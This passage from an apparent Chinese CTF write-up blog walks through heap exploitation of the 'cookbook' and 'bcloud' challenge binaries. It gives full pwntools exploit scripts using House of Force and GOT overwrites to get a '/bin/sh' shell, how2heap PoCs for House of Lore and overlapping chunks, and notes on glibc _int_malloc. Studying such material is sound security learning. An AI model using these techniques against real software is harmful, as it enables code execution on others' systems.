然后用0x0804D00C这个地方用来写size,最后使用哪个表作为system我用的是atoi(好像用free更方便一点)。然后输入name的时候由于fgets会损坏一个Byte的数据,所以我干脆把一些表项全填上去了,当我把要利用的函数的偏移一个个的填上去之后发现,利用的时候由于memcpy是cpy0x80个字节的数据,刚好把bss上的stdin和stdout给写没了,所以又去把stdin和stdout的地址写了上去才成功

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
# -*- coding: utf-8 -*-
# Exploit script for the `cookbook` binary, built on pwntools.
# NOTE(review): string handling below mixes str and packed bytes, which looks
# like it targets Python 2 — confirm before running under Python 3.
from __future__ import print_function
from pwn import *
import numpy

binary = 'cookbook' #binary's name here
context.binary = binary #context here
context.log_level='debug'
# Run the target locally with a pseudo-terminal on stdin/stdout and ASLR enabled.
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
# The string literal below is a disabled template for attacking a remote target instead.
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack helpers: pad a short leak with NUL bytes to 8 / 4 bytes before unpacking.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
# Template constants; neither is referenced by the rest of this script.
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" +''+hex() + "\033[0m")

# todo here
def main_choice(cha):
    """Select an entry of the main menu.

    Waits on the global tube `p` until the menu prompt (ending in '[q]uit'
    plus a newline) has arrived, then sends `cha` followed by a newline.
    """
    p.recvuntil('[q]uit\n')
    p.sendline(cha)

def Ing_choice(cha):
    """Select an entry of the ingredient sub-menu.

    Waits on the global tube `p` for the sub-menu prompt (ending in 'quit)?'
    plus a newline), then sends `cha` followed by a newline.
    """
    p.recvuntil('quit)?\n')
    p.sendline(cha)

def recipe_choice(cha):
    """Select an entry of the recipe sub-menu.

    The recipe menu ends with the same '[q]uit' line as the main menu, so this
    waits for that prompt on the global tube `p` and then sends `cha` plus a
    newline.
    """
    p.recvuntil('[q]uit\n')
    p.sendline(cha)

def creat_for_leak():
    """Create the ingredient named '********' that the leak helpers refer to.

    Menu walk: main 'a' -> ingredient 'n' -> 'g' + name -> 'e' -> 'q'.
    NOTE(review): 'n'/'g'/'e' presumably mean new / give name / export (save);
    confirm against the binary's menu text.
    """
    main_choice('a')
    Ing_choice('n')
    Ing_choice('g')
    # Give the binary a moment to reach its name read before sending the name.
    sleep(0.1)
    p.sendline('********')
    Ing_choice('e')
    Ing_choice('q')

def creat_for_fill():
    """Create another ingredient named '********' before the top-chunk overwrite.

    Performs exactly the same menu walk as creat_for_leak():
    main 'a' -> ingredient 'n' -> 'g' + name -> 'e' -> 'q'.
    """
    main_choice('a')
    Ing_choice('n')
    Ing_choice('g')
    # Give the binary a moment to reach its name read before sending the name.
    sleep(0.1)
    p.sendline('********')
    Ing_choice('e')
    Ing_choice('q')

def leak_heap():
    """Leak a heap address through the recipe menu and return the heap base.

    Menu walk: main 'c' -> recipe 'n' -> 'a' (add ingredient '********',
    quantity 0x1) -> 'd' -> 'p'. According to the write-up, 'd' frees the
    recipe without clearing the current-recipe pointer, so 'p' prints data of
    the freed chunk.

    Returns the decimal number printed before ' -' on the fourth output line,
    minus the fixed offset 0x1780.
    """
    main_choice('c')
    recipe_choice('n')
    recipe_choice('a')
    p.recvuntil('to add? ')
    p.sendline('********')
    p.recvuntil('many? (hex): ')
    p.sendline('0x1')
    recipe_choice('d')
    recipe_choice('p')
    # Skip the three lines that precede the line carrying the leaked value.
    p.recvuntil('\n')
    p.recvuntil('\n')
    p.recvuntil('\n')
    heap_base = int(p.recvuntil(' -').strip(' -')) - 0x1780
    recipe_choice('q')
    return heap_base

def leak_libc():
    """Leak a libc address through a stale recipe entry and return the libc base.

    Steps: create a recipe containing ingredient '********' (quantity 0x1),
    leave the recipe menu, remove that ingredient via main-menu option 'e',
    then re-enter the recipe menu and print it. The number printed after '$'
    is read as decimal and the fixed offset 0x1b27b0 is subtracted.
    """
    main_choice('c')
    recipe_choice('n')
    recipe_choice('a')
    p.recvuntil('to add? ')
    p.sendline('********')
    p.recvuntil('many? (hex): ')
    p.sendline('0x1')
    recipe_choice('q')
    # Remove the ingredient while the recipe still references it.
    main_choice('e')
    p.recvuntil('exterminate? ')
    p.sendline('********')
    main_choice('c')
    recipe_choice('p')
    p.recvuntil('$')
    libc_base = int(p.recvuntil('\n').strip('\n')) - 0x1b27b0
    recipe_choice('q')
    return libc_base

def set_topsize():
    """Overflow a recipe buffer so that the top chunk's size becomes 0xffffffff.

    Uses recipe-menu option 'g' to send 0x3c0 filler bytes followed by
    p32(0xffffffff); per the write-up this overflow reaches the top chunk's
    size field, which is the precondition for House of Force.
    """
    main_choice('c')
    recipe_choice('g')
    # Give the binary a moment to reach its read before sending the payload.
    sleep(0.1)
    p.sendline('a'*0x3c0 + p32(0xffffffff))
    recipe_choice('q')

# Answer the initial name prompt.
p.recvuntil('your name?\n')
p.sendline('ljc')

# Stage 1: leak the heap base and the libc base.
creat_for_leak()
heap_base=leak_heap()
log.info("\033[1;36m" +'heap_base:'+hex(heap_base) + "\033[0m")
libc_base=leak_libc()
log.info("\033[1;36m" +'libc_base:'+hex(libc_base) + "\033[0m")

# Stage 2: corrupt the top chunk size.
creat_for_fill()
set_topsize()

# Stage 3: House of Force — request a size that moves the top chunk to the target.
#new_top->0x0804D000
#req = dest - old_top - 4*sizeof(long)
# A one-element uint32 array is used so the subtraction wraps around like 32-bit arithmetic.
req =numpy.array([0x0804D010,],dtype=numpy.uint32)
main_choice('g')
p.recvuntil('hacker!) : ')
# heap_base+0x17a0 is used as old_top; 4*4 is 4*sizeof(long) on this 32-bit target.
req[0]=req[0]-(heap_base+0x17a0)-4*4
log.info(hex(req[0]))
p.sendline(hex(req[0]))

# Stage 4: the next ingredient allocation overlaps the relocated top chunk; its name
# is written over a table of function pointers (the GOT, according to the write-up).
#gdb.attach(p,'b *0x08048D40')
main_choice('a')
Ing_choice('n')
# Offsets added to libc_base below; entries left at 0 are written as plain zero words.
free =0x1ec180
memcpy=0x77610
fgets =0x5e150
alarm =0xb0270
stk =0
malloc=0x1ec110
puts =0x5fca0
g=0
strtoul=0
start=0
buf=0
# The write-up states that the atoi entry is the one redirected to system.
system=0x3ada0
calloc=0x1ec130
Ing_choice('g')
name=p32(free+libc_base)+p32(memcpy+libc_base)+p32(fgets+libc_base)+p32(alarm+libc_base)+p32(stk)+p32(malloc+libc_base)+p32(puts+libc_base)+p32(g)+p32(strtoul)
name+=p32(start)+p32(buf)+p32(system+libc_base)+p32(calloc+libc_base)
name=name.ljust(0x68,'\x00')
# NOTE(review): presumably the stdin/stdout pointers in .bss that the write-up says must be restored — confirm offsets.
name+=p32(0x1b25a0+libc_base)
name+=p32(0x1b2d60+libc_base)
p.sendline(name)
# Trigger the hijacked entry with '/bin/sh' as its argument.
Ing_choice('s')
p.sendline('/bin/sh')

p.interactive()

bcloud

程序分析

注:这个程序分析是在我写完题之后再来写的,可能会有很多东西会有剧透的既视感…主要是用来帮助自己以后看的

main就是很正常的菜单,就不多废话了,直接从其中做初始化的函数开始看

初始化函数

0x0804899C:这个函数包括了两个函数,其中分别对应两个输入点

姑且称第一个是input_name,第二个是input_org_host

input_name

这里有一个比较坑的点我刚开始一直都没发现(当然还是自己太菜了),因为这个readn_add0(ptr,n,chr)是一个最多读取n个字符然后会在结尾处+0的函数,如果read过程中碰到chr就直接+0退出结束,也就是说如果我们输入了0x40个字符,他就会在0x41处补0。在这里,我们输入0x40之后他会把0补在V2这个变量处,随之被malloc的指针覆盖了,由于32位程序中指针都占4字节,所以覆盖之后这里直接连着堆指针一起strcpy进了chunk中,没有\x00截断。然后调用info输出了chunk中的内容

input_org_host

上面的trick在这里同样出现了一遍,当然这里主要是org v2 host这三个连在了一起,最后在strcpy的时候是一个比较大的溢出,由于v2对应的chunk紧跟的就是top_chunk,所以很自然能联想到house_of_force

new

根据下标和记录存放malloc的ptr,length由我们输入然后会被存到len_Array中,接着根据length读入content,由于malloc时是length+4,所以构成不了overflow

edit

没什么好说的了,就是根据存的len来读数据

delete

1582413728779

先把ptr存在栈上,清空记录然后free(ptr)

其他的函数都好像没什么用就不用管了

Exploit

主要就是第二个初始化input_org_host中产生的house_of_force,先将top_chunk.size根据溢出赋值成0xffffffff,然后malloc一个负数设置top_chunk,之后再利用edit就好了,主要就是得发现house_of_force这个洞23333

接着就是在我们的ptr_Array上玩了,我设置的dest稍微在array上面一点,主要是当时免得出错,反正edit的时候可以打pad,当我们用设置好top之后,id0被占用,再新malloc出来用来写Array的chunk会放在index1,当然这个chunk我只写了一次,只用把对应的东西布置好就行了,具体布置什么见以下

由于我们最终的目的是要getshell,仅仅只有一个heap_base肯定是不行的,我们还需要leak一个libc的地址,这里我稍微想了一会,至于libc地址现在可以存在于三个地方:stack、got或者非fastbin链中的chunk。我最开始想的是:通过再malloc一个大一点的chunk之后free,然后在array上就有libc地址了,通过写一个array上的记录指向这个地址就可以打印,但是怎么打印呢,一般打印的方法有通过程序中有输出点的地方打印,或者通过栈溢出控制函数参数、返回地址到puts_plt这样打印,可是这个程序既没有打印chunk的函数…..也无法栈溢出或者泄露栈地址什么的,但是我想到能够设置一个GOT表然后调用edit修改,我们手上暂时又只有程序的地址可以用,所以我就找了一下有什么函数可以用来接受一个地址然后输出的(因为我们程序中使用Array中的数据而且调用到库函数的只有free),刚好有一个函数0x08048779,是接受一个地址然后打%s,这大概就是出题人故意设置的吧2333。所以把free的GOT改成这个函数就可以了,free的GOT表项后面是__stack_chk_fail,不会影响什么

不过我最开始的那个思路free一个大一点的chunk失败了,所以就转而想到了更简单的方法,利用GOT表

然后我们的Array上现在只需要有一样东西就行:GOT表地址。一个用来改free的GOT,一个用来leak

leak之后再把free的GOT改成system,然后malloc一个/bin/sh\x00的chunk,然后free就好了

好像也可以改atoi的GOT更方便一些(或者当修改GOT表影响了相邻表项会出错时可以试试)不过这里就不做多余的事了,getshell就行

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# -*- coding: utf-8 -*-
# Exploit script for the `bcloud` binary, built on pwntools.
# NOTE(review): string handling below mixes str and packed bytes, which looks
# like it targets Python 2 — confirm before running under Python 3.
from __future__ import print_function
from pwn import *

binary = 'bcloud' #binary's name here
context.binary = binary #context here
context.log_level='debug'
# Run the target locally with a pseudo-terminal on stdin/stdout and ASLR enabled.
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
# The string literal below is a disabled template for attacking a remote target instead.
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack helpers: pad a short leak with NUL bytes to 8 / 4 bytes before unpacking.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
# Template constants; neither is referenced by the rest of this script.
ub_offset = 0x3c4b30
codebase = 0x555555554000
def loginfo(what='', address=0):
    """Log `what` and `address` (as hex) on one highlighted line.

    The message is wrapped in the ANSI escape sequences for bold cyan and
    emitted through pwntools' log.info.
    """
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")
# todo here

def new(len, content):
    """Create a note through menu option '1'.

    `len` is sent as the requested note length (decimal string plus newline);
    `content` is sent verbatim, so the caller must include the terminating
    newline if the binary expects one.
    """
    p.recvuntil('option--->>\n')
    p.sendline('1')
    p.recvuntil('the note content:\n')
    p.sendline(str(len))
    p.recvuntil('the content:\n')
    p.send(content)
def edit(id, content):
    """Overwrite the content of note `id` through menu option '3'.

    `content` is sent verbatim (no newline is appended).
    """
    p.recvuntil('option--->>\n')
    p.sendline('3')
    p.recvuntil('the id:\n')
    p.sendline(str(id))
    p.recvuntil('new content:\n')
    # Empty marker line in the log just before the payload goes out.
    loginfo('', 0)
    p.send(content)
def delete(id):
    """Delete note `id` through menu option '4'.

    Unlike the other helpers, this waits for 'the id:' without a trailing
    newline before sending the index.
    """
    p.recvuntil('option--->>\n')
    p.sendline('4')
    p.recvuntil('the id:')
    p.sendline(str(id))
# Stage 1: heap leak. A full 0x40-byte name leaves no NUL terminator in front of the
# adjacent heap pointer, so the echoed name is followed by that pointer.
p.recvuntil('your name:\n')
p.send('a'*0x40)
p.recvuntil('a'*0x40)
heap_base=my_u32(p.recv(4))-0x8
loginfo('heap_base',heap_base)


# Stage 2: Org (0x40 bytes) and Host are copied together; the four 0xff bytes of Host
# are meant to land on the top chunk's size field (0xffffffff).
p.recvuntil('Org:\n')
p.send('a'*0x40)
p.recvuntil('Host:\n')
p.sendline('\xff'*4)

# Stage 3: House of Force. dest lies slightly before the note pointer array.
dest=0x0804B110
old_top=heap_base+0xd8
# The extra -4 compensates for the binary allocating length+4 bytes per note.
corrupt_size=dest-old_top-4*4-4
#req = dest - old_top - 4*sizeof(long)
leakfunction=0x08048779
free_got=0x0804B014


# NOTE(review): debugger attach left enabled; it requires gdb on the machine running the exploit.
gdb.attach(p,'b *0x08048b4f')
new(corrupt_size,'\n')#set top
# 0x10 bytes of padding, then the array slots: id 0 -> atoi GOT entry, id 1 -> free GOT entry.
new(0x18,'a'*0x10+p32(0x0804B03C)+p32(free_got)+'\n')#id 0 1 atoi_got

# Stage 4: point free's GOT entry at the binary's print-string routine, then "free"
# note 0 so the contents of the atoi GOT entry are printed.
edit(1,p32(leakfunction)+'\n')
delete(0)

p.recvuntil('Hey ')
libc_base=my_u32(p.recv(4))-0x2d250
loginfo('libc base',libc_base)
# Stage 5: redirect free to system and free a note that holds "/bin/sh".
system=0x3ada0+libc_base
edit(1,p32(system)+'\n')
new(0x8,'/bin/sh\x00\n')
delete(0)
p.interactive()

how2heap - house_of_lore&overlapping_chunks_2

ubuntu16.04 libc2.23

这两个没有例题所以我放在一起了

house_of_lore.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
/*
Advanced exploitation of the House of Lore - Malloc Maleficarum.
This PoC take care also of the glibc hardening of smallbin corruption.
[ ... ]
else
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim)){
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
[ ... ]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Target of the hijacked control flow: prints a marker line, then exits with status 0. */
void jackpot()
{
    puts("Nice jump d00d");
    exit(0);
}

/*
 * House of Lore walkthrough.
 *
 * Frees a small chunk, lets it get sorted into its small bin, overwrites its
 * bk pointer with the address of a fake chunk built on the stack, and then
 * allocates twice so that the second allocation is expected to come from the
 * stack. Finally writes the address of jackpot() at p4+40.
 * All progress messages go to stderr. The memory corruption is intentional.
 */
int main(int argc, char * argv[]){


/* Stack arrays used as fake chunks; slots [2] and [3] are filled in as fd and bk below. */
intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[3] = {0};

fprintf(stderr, "\nWelcome to the House of Lore\n");
fprintf(stderr, "This is a revisited version that bypass also the hardening check introduced by glibc malloc\n");
fprintf(stderr, "This is tested against Ubuntu 14.04.4 - 32bit - glibc-2.23\n\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");

fprintf(stderr, "Allocating the victim chunk\n");
intptr_t *victim = malloc(100);
fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim);

// victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk
intptr_t *victim_chunk = victim-2;

fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2);

fprintf(stderr, "Create a fake chunk on the stack\n");
fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted"
"in second to the last malloc, which putting stack address on smallbin list\n");
/* Fake chunk 1: zeroed header words, fd (slot 2) points back at the victim chunk. */
stack_buffer_1[0] = 0;
stack_buffer_1[1] = 0;
stack_buffer_1[2] = victim_chunk;

fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
"in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake "
"chunk on stack");
/* Fake chunk 1 bk (slot 3) -> fake chunk 2; fake chunk 2 fd (slot 2) -> fake chunk 1. */
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;

fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with"
"the small one during the free()\n");
void *p5 = malloc(1000);
fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5);


fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
free((void*)victim);

/* Deliberate reads of the freed chunk: its first two words now hold the list pointers. */
fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are nil\n");
fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim);

void *p2 = malloc(1200);
fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);

fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n");
fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

//------------VULNERABILITY-----------

fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack

//------------------------------------

fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n");
fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");

/* First allocation of the victim's size; its result is not used afterwards. */
void *p3 = malloc(100);


fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
char *p4 = malloc(100);
fprintf(stderr, "p4 = malloc(100)\n");

fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
stack_buffer_2[2]);

fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack
intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
/* Copies 8 bytes of sc to offset 40 from p4, i.e. past the start of the returned stack region. */
memcpy((p4+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
}

说白了就是在栈上伪造出一个smallbin链里面的chunk来,然后把smallbin链中chunk的bk更改到栈上我们伪造的chunk处

这里在栈上伪造的chunk是这样的

header(fill 0)chunk1 header(fill 0)
fd=victim bk=chunk2
header(fill 0)chunk2 header(fill 0)
fd = chunk1↑ #这里没必要,只检查fd

这样,示例代码中连续两次通过victim->bk->fd的检查就可以把栈上的chunk1 malloc出来了,从而修改返回地址到shellcode

是一个比较简单的原理

overlapping_chunks_2.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
/*
Yet another simple tale of overlapping chunk.
This technique is taken from
https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf.

This is also referenced as Nonadjacent Free Chunk Consolidation Attack.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
 * Overlapping-chunks demo (variant 2).
 *
 * Allocates five 1000-byte chunks, frees p4, overwrites the size field of the
 * in-use chunk p2 so that it also covers p3, frees p2 and then allocates p6
 * from the resulting oversized free chunk. Writing through p6 is then shown
 * to change the data seen through p3. The out-of-bounds write is intentional.
 */
int main(){

intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
/* Low bit OR-ed (here: added) into the forged size value. */
int prev_in_use = 0x1;

fprintf(stderr, "\nThis is a simple chunks overlapping problem");
fprintf(stderr, "\nThis is also referenced as Nonadjacent Free Chunk Consolidation Attack\n");
fprintf(stderr, "\nLet's start to allocate 5 chunks on the heap:");

p1 = malloc(1000);
p2 = malloc(1000);
p3 = malloc(1000);
p4 = malloc(1000);
p5 = malloc(1000);

/* Usable sizes as reported by the allocator; these drive the fills and the forged size below. */
real_size_p1 = malloc_usable_size(p1);
real_size_p2 = malloc_usable_size(p2);
real_size_p3 = malloc_usable_size(p3);
real_size_p4 = malloc_usable_size(p4);
real_size_p5 = malloc_usable_size(p5);

fprintf(stderr, "\n\nchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1));
fprintf(stderr, "\nchunk p2 from %p to %p", p2, (unsigned char *)p2+malloc_usable_size(p2));
fprintf(stderr, "\nchunk p3 from %p to %p", p3, (unsigned char *)p3+malloc_usable_size(p3));
fprintf(stderr, "\nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4));
fprintf(stderr, "\nchunk p5 from %p to %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));

/* Fill every chunk with a distinct letter so overlaps are visible when printed. */
memset(p1,'A',real_size_p1);
memset(p2,'B',real_size_p2);
memset(p3,'C',real_size_p3);
memset(p4,'D',real_size_p4);
memset(p5,'E',real_size_p5);

fprintf(stderr, "\nLet's free the chunk p4.\nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4\n");

free(p4);

fprintf(stderr, "\nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2\nwith the size of chunk_p2 + size of chunk_p3\n");

/* Emulated overflow: writes at the end of p1's usable area, i.e. at p2's size field.
   New value = usable sizes of p2 and p3 + 2*sizeof(size_t) + the low in-use bit. */
*(unsigned int *)((unsigned char *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; //<--- BUG HERE

fprintf(stderr, "\nNow during the free() operation on p2, the allocator is fooled to think that \nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) \n");
fprintf(stderr, "\nThis operation will basically create a big free chunk that wrongly includes p3\n");
free(p2);

fprintf(stderr, "\nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunk\n");

p6 = malloc(2000);
real_size_p6 = malloc_usable_size(p6);

fprintf(stderr, "\nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and \nwe can overwrite data in p3 by writing on chunk p6\n");
fprintf(stderr, "\nchunk p6 from %p to %p", p6, (unsigned char *)p6+real_size_p6);
fprintf(stderr, "\nchunk p3 from %p to %p\n", p3, (unsigned char *) p3+real_size_p3);

fprintf(stderr, "\nData inside chunk p3: \n\n");
fprintf(stderr, "%s\n",(char *)p3);

fprintf(stderr, "\nLet's write something inside p6\n");
/* 1500 bytes written through p6; the second dump of p3 below shows the effect. */
memset(p6,'F',1500);

fprintf(stderr, "\nData inside chunk p3: \n\n");
fprintf(stderr, "%s\n",(char *)p3);
}

这个代码就是我前面写overlapchunk1用到的,通过溢出修改chunk的size字段,然后就可以在free时free出一大块chunk(不过此时要注意free的检查)一般是设置扩充的chunk刚好在某个chunk头部,当然如果chunk里面有合适的size也可以使用,这个我也暂时不debug了后面回来一起写总结

_int_malloc(mstate av, size_t bytes)

  • 根据bytes参数计算要申请的chunk大小nb
  • 判断av是否为空,不为空跳过这一步,进入之后的流程
    • 直接通过nb和av用sysmalloc调用分配
      • 分配成功,返回分配区对应指针
      • 分配失败,返回0

fastbin↓

  • 调用get_max_fast()获得global_max_fast变量的值判断nb是否在fastchunk范围内,不是则略过这一步
    • 通过位移忽略nb低位来计算fastbin中的index,然后获取要分配的bin链头
    • 判断链头是否为null,为null则跳出fastbin操作
    • 否则从单链表取下该victim chunk
      • 判断fastbin_index (chunksize (victim)) != idx,如果该victim的index与本链不对应则报错结束
      • 指针转换chunk2mem,然后返回该指针

smallbin↓

  • 判断nb是否<MIN_LARGE_SIZE(Macro,非变量)
    • 是:
    • 位移忽略nb低位来计算smallbin中的index,然后获取要分配的bin链头
    • 如果bin链头的bk指向的不是自身则赋值bk给victim并进行以下操作,否则跳过(这里可以看出smallbin是从链尾开始取chunk的)
      • 如果判断victim为0则说明该arena需要初始化,调用malloc_consolidate,之后跳出该smallbin操作
      • 不为0说明该bin链有chunk,获取victim->bk指针bck
        • bck->fd != victim,则报错结束
        • 这里说明成功分配,根据victim和nb设置相邻前向chunk的prev_inuse位为1,然后从双向链表取下victim chunk,设置size字段然后chunk2mem,返回
    • 不是:
    • 位移忽略nb低位来计算对应largebin中的index
    • 如果fastbin中有chunk(通过av的标识位判断),调用malloc_consolidate

recently freed or remaindered chunks↓

  • 大循环###########################################################################
    • 嵌套循环(由unsortedbin中是否有chunk和最大遍历chunk数决定次数)↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
      • 如果unsortedbin头bk指针不为自身则赋值victim(同样是从链尾取chunk),否则退出第二层循环
      • 获取victim chunk的bk指针bck
      • 判断victim的size字段是否满足2*size_t < victim->size <= system_mem,不满足则报错结束
        • 如果满足(in_smallbin_range)(bck == unsorted_chunks ,即unsortedbin中只有一个chunk)(victim==last_remainder,即上次被切割的chunk)(size>nb+MINSIZE,MINSIZE是能够分配的最小chunk)这四个条件则进行以下操作(这里只是为了从unsortedbin唯一chunk,而且还是last_remainder中切割出small chunk)
        • 设置新的remainder,并链入unsortedbin
        • 如果remainder不是largebin需要将fd_nextsize和bk_nextsize清零
        • 设置victim的size字段(prev_inuse默认为1)
        • 设置remainder的size字段和更新前向chunk的prev_size字段
        • chunk2mem,返回切割下来的victim
      • 从unsorted chunk中取下该victim
      • 如果该victim的size==nb进行以下操作否则略过(刚好碰到unsortedbin中相等大小的chunk)
        • 设置victim前向chunk的prev_inuse为1
        • 设置victim的size字段
        • chunk2mem,返回victim
      • 通过in_smallbin_range判断victim的size(这个操作是为了将不满足的chunk链入bin链,判断只是在small chunk和large chunk上做不同的工作而已)
        • 满足:
          • 计算对应smallbin中的index
        • 不满足:
          • 说明是largechunk
          • 找到largebin中对应的index和bin链中的位置
        • 在binmap设置对应的index为1,说明该bin链有chunk
        • 将该chunk通过获得的fwd和bck链入bin链
      • 嵌套循环结尾↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
    • 通过in_smallbin_range判断nb,不是则进行以下操作,是则跳过(这里是去largebin中对应的index切割出chunk来,small chunk和largebin中对应bin链没有chunk的还得等到下面binmap去找)
      • 获取对应largebin中的bin链头作为victim
      • bin链中有chunk,并且victim的size大于等于nb则进行下一系列操作
        • 反向遍历chunk size链表,直到找到第一个大于等于所需chunk大小的chunk
        • 如果从 large bin 链表中选取的 chunk victim 不是链表中的最后一个 chunk,并且与 victim大小相同的chunk不止一个,那么意味着victim为chunk size链表中的节点,为了不调整chunksize 链表,需要避免将 chunk size 链表中的节点取出,所以取 victim->fd 节点对应的 chunk作为候选 chunk。由于 large bin 链表中的 chunk 也是按大小排序,同一大小的 chunk 有多个时,这些 chunk 必定排在一起,所以 victim->fd 节点对应的 chunk 的大小必定与 victim 的大小一样(这段我直接复制的华庭,因为涉及largebin的概念太多了)
        • 计算victim切割后的大小,并调用 unlink()宏函数将 victim 从 bin 链中取出 ※※
        • 判断切割后的大小是否小于MINSIZE(判断返回chunk之前要不要切一下)
          • 是,切割失败,不用切了,设置victim前向chunk的prev_inuse为1并设置victimsize字段
          • 否,切割成功,设置remainder
            • 检查unsortedbin链表头是否正常,不正常则报错结束
            • 重复将remainder链入unsortedbin中的操作(前面嵌套循环中打处)
        • chunk2mem,返回victim
    • 到这里便开始使用binmap分配(largebin和smallbin中对应index都没有chunk的)
    • 获取我们需要大小chunk对应bin的下一个bin的空闲chunk链表,并获取该bin对于binmap中的bit位的值 (开始从稍大的chunk中寻找)
    • 嵌套循环↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
      • 首先找到对应的binmap中对应的block(找不到则直接去use_top),然后找到block中的对应bit位和对应的bin链
      • 判断此时 victim 与 bin 链表头是否相同
